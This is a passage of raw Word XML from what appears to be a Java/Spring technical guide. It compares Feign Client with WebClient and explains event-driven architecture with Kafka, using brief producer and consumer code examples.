            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="046BE50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ature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A3E46B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ign Client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="022C8A8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ebClient</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="1F991E04" w14:textId="77777777" w:rsidTr="00FF6B93">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DD440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ype</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52C19B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by default</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68870A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and Asynchronous (Non-blocking)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="6CAB2096" w14:textId="77777777" w:rsidTr="00FF6B93">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5021470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deal For</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27AE037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ommunication (simple APIs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59C81A7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active, non-blocking applications or complex API calls</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="43131E15" w14:textId="77777777" w:rsidTr="00FF6B93">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C0E1BE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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4450EE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integration (e.g., with Ribbon, Eureka)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FD46A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native integration, but works well in Spring WebFlux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="3763BE52" w14:textId="77777777" w:rsidTr="00FF6B93">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F75E82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Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7958799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ifies HTTP calls in microservices (service-to-service)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="523E34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reactive, and customizable HTTP requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="494130DA" w14:textId="77777777" w:rsidTr="00FF6B93">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="088916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ustomization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E3D57A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imited customization (headers, timeouts, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="625746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ull control over request, response, and error handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="622ABAEA" w14:textId="77777777" w:rsidTr="00FF6B93">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64FBE88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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F142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matic retry, circuit breaker with Hystrix (if used)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="325782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etailed error handling, with access to status codes and bodies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="617F4022" w14:textId="77777777" w:rsidTr="00FF6B93">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C517B6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Learning Curve</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CF8C4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 to use, minimal configuration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EA8EC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use, but more flexible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B3EF9" w:rsidRPr="008B3EF9" w14:paraId="7E0A8B9B" w14:textId="77777777" w:rsidTr="00FF6B93">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69CC4E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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DF2A2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suitable for high concurrency, synchronous</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="404A50C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uitable for high concurrency, non-blocking operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="759AAF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23656">
          <v:rect id="_x0000_i2981" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5BB8E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Which?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD0D9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Feign Client</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563B62F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working with microservices and need simple, declarative HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F508282"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want Spring Cloud integration for features like service discovery (Eureka) and load balancing (Ribbon).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAB9AD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you prefer to abstract away HTTP request/response details and are okay with synchronous, blocking calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685F9C8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WebClient</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37055F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building a reactive application with high concurrency and need non-blocking calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641C7EC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more control over HTTP requests, including custom headers, cookies, and body content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3438078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to handle asynchronous operations and work with Spring WebFlux for scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6484EC0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5A60A92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is best suited for simple, declarative service-to-service communication, especially in microservices architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494635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better suited for reactive applications, non-blocking I/O, and when you need fine-grained control over the HTTP request/response lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2588046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you're building a traditional, synchronous microservices application, </w:t>
      </w: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likely the best choice. If you're working with a more modern, reactive architecture that requires non-blocking calls and scalability,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would be the better option.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA1E678" w14:textId="738DE506"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982" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09570B63" w14:textId="5EABAA7E" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00B07073">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="716" w:name="_Toc197867930"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Event-driven architecture and Kafka integration</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="716"/>
    </w:p>
    <w:p w14:paraId="15D476CE" w14:textId="7A7B5F13" w:rsidR="00FF6B93" w:rsidRPr="008B3EF9" w:rsidRDefault="00FF6B93"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vent-Driven Architecture and Kafka Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DE84D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Concepts of Event-Driven Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E1C4C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w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Components that generate events and push them to the event stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514792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w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Components that listen to events from the event stream and take action based on the event data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DEB55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Bus</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A messaging layer (e.g., Kafka) that allows communication between producers and consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DEFA9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reams</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Sequences of events, often stored in topics, that are produced and consumed by different services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6040004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ore</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A durable storage of event streams, where each event is stored and can be read by any service interested in that event.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12571E4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as an Event Streaming Platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333046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roducer</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: An application that sends events (messages) to Kafka topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A146DA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w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: An application that reads events from Kafka topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBF19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s</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka organizes events into logical channels known as topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A37881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Brokers</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka brokers handle the distribution of data across a Kafka cluster, ensuring high availability and fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6C687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Zookeeper</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka relies on Zookeeper for managing and coordinating the Kafka cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEF969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sures that the event-driven system can handle high volumes of events in a distributed manner and guarantees event delivery and fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E70C2A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ADFDCC">
          <v:rect id="_x0000_i2983" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E9139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Integration in Event-Driven Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A0FF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 (Publishing Events)</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497824D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In EDA, the service or application that generates the event (producer) sends the event message to a Kafka topic. This can be any change of state, such as "user created", "order placed", "payment completed", etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2129AEB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send events asynchronously to Kafka topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5721345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Topics</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE1E9D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pics are logical channels where events are stored. Producers write to topics, and consumers read from topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D496BB"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Kafka topic is essentially a stream of events that can be consumed by multiple consumers at once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA72B3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 (Consuming Events)</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E30FDE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that listen to events from Kafka are called consumers. A consumer subscribes to a Kafka topic and processes the event when it is produced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4889272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mers can be independent and process events in real-time as they occur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AF479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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5AA94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asynchronous communication between services. This allows services to operate independently and react to events when they are ready to handle them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041CC37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asynchronous nature decouples the services, making the system more scalable and resilient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E83686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ing with Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7248E56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raditional architectures, services often communicate synchronously (e.g., via REST API calls), which tightly couples them together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71964E4D"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ith Kafka, services communicate asynchronously via events. This allows for better scalability, fault tolerance, and resilience because the failure of one service does not directly affect others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E46D9B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E6044">
          <v:rect id="_x0000_i2984" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1BBB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Flow of Kafka Integration in Event-Driven Architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EA167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Let's say you are building an </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>E-commerce platform</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and you want to integrate Kafka in an event-driven way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506D3CEE"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1: Event Production (Producer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C764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generates an event every time a new order is placed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4176E81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New Order Placed"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B2324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order-placed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143F1CD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Producer Example using Spring Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5443330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wired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3109B79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ivate KafkaTemplate&lt;String, String&gt; kafkaTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD3DA3D" w14:textId="77777777" w:rsidR="00FF6B93" w:rsidRPr="008B3EF9" w:rsidRDefault="00FF6B93" w:rsidP="008B3EF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="466848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placeOrder(Order order) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B517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place order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2349E90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tring orderEvent = "New Order Placed: " + order.getId();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657CEE1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kafkaTemplate.send("order-placed", orderEvent);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C76FB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2161E51"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2: Event Consumption (Consumer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5595EAE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listens for the "New Order Placed" event to update inventory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7361AC41"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 subscribes to topic</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> order-placed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051A41F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mer Example using Spring Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B622A8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Listener(topics = "order-placed", groupId = "inventory-service")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6005550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consume(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479CCAC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update inventory based on order data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651C4C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ystem.out.println("Inventory Service received message: " + message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B174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7C74E7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3: Event Processing &amp; Further Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341B0B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fter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updates inventory, it might produce another event:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8850E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Inventory Updated"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6494976A"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inventory-updated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3381B41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can then consume this event to start the shipment process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E7D15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CC6C">
          <v:rect id="_x0000_i2985" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0556ECC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Event-Driven Architecture with Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C606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1E8BB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and consumers are decoupled, meaning they don't depend on each other’s availability. Consumers can process events at their own pace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485CCA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r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD33B1F"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Kafka can handle a massive amount of data in real-time. By distributing the events across Kafka partitions and brokers, Kafka ensures that the system can scale horizontally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048FDB1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silience</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD40DF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stores events in a distributed, fault-tolerant way. If a consumer fails, it can pick up from where it left off by consuming the event from the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B28A10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Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B79E9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near real-time event processing, where services react to events as soon as they are published.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4C785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Replay</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B1D89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retains events for a certain retention period, which allows consumers to replay events if needed, useful for event-driven workflows like auditing or reprocessing data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CE957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21C29">
          <v:rect id="_x0000_i2986" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
